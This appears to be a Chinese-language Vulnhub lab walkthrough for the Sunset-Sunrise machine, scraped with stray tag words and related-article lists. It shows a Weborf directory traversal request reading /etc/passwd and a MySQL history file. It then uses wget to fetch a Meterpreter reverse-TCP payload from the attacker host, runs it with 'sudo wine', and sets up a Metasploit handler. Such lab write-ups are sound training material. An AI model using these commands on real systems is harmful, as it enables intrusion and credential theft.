Sunset-Sunrise: Vulnhub Walkthrough
靶機連接:python
https://www.vulnhub.com/entry/sunset-sunrise,406/mysql
主機掃描:web
端口掃描:sql
HTTP 80 目錄枚舉未果shell
HTTP 8080windows
Google search :Weborf/0.12.2 exploittcp
https://www.exploit-db.com/exploits/149253d
Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswdcode
成功讀取文件,而後咱們嘗試讀取一些敏感的目錄和文件,最後讀取MySQL的密碼:blog
http://10.10.203.22:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history
嘗試使用帳戶登陸系統
如何獲取用戶sunsire的權限,最後經過MySQL的用戶信息獲取到了密碼
接下來進行提權操做
這裏使用wine命令
控制端生成payload
msfpc windows 10.10.203.14
python -m SimpleHTTPServer 8888
use exploit/multi/handler
set encoder x86/shikata_ga_nai
set lhost 10.10.203.14
set lport 443
exploit -j
靶機上執行:
wget http://10.10.203.14:8888/windows-meterpreter-staged-reverse-tcp-443.exe
sudo wine windows-meterpreter-staged-reverse-tcp-443.exe
而後控制端就shell上線了
OVER!!!
- 1. HA: Dhanush Vulnhub Walkthrough
- 2. HA: Chakravyuh Vulnhub Walkthrough
- 3. Sunset: dusk: Vulnhub Walkthrough
- 4. Girlfreind:1 Vulnhub Walkthrough
- 5. Happycorp:1 Vulnhub Walkthrough
- 6. Sunset: Nightfall Vulnhub Walkthrough
- 7. HA: Chanakya Vulnhub Walkthrough
- 8. HA Joker Vulnhub Walkthrough
- 9. Matrix-3: Vulnhub Walkthrough
- 10. Sunset: Vulnhub Walkthrough
- 更多相關文章...
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. vs2019運行opencv圖片顯示代碼時,窗口亂碼
- 2. app自動化 - 元素定位不到?別慌,看完你就能解決
- 3. 在Win8下用cisco ××× Client連接時報Reason 422錯誤的解決方法
- 4. eclipse快速補全代碼
- 5. Eclipse中Java/Html/Css/Jsp/JavaScript等代碼的格式化
- 6. idea+spring boot +mabitys(wanglezapin)+mysql (1)
- 7. 勒索病毒發生變種 新文件名將帶有「.UIWIX」後綴
- 8. 【原創】Python 源文件編碼解讀
- 9. iOS9企業部署分發問題深入瞭解與解決
- 10. 安裝pytorch報錯CondaHTTPError:******
- 1. HA: Dhanush Vulnhub Walkthrough
- 2. HA: Chakravyuh Vulnhub Walkthrough
- 3. Sunset: dusk: Vulnhub Walkthrough
- 4. Girlfreind:1 Vulnhub Walkthrough
- 5. Happycorp:1 Vulnhub Walkthrough
- 6. Sunset: Nightfall Vulnhub Walkthrough
- 7. HA: Chanakya Vulnhub Walkthrough
- 8. HA Joker Vulnhub Walkthrough
- 9. Matrix-3: Vulnhub Walkthrough
- 10. Sunset: Vulnhub Walkthrough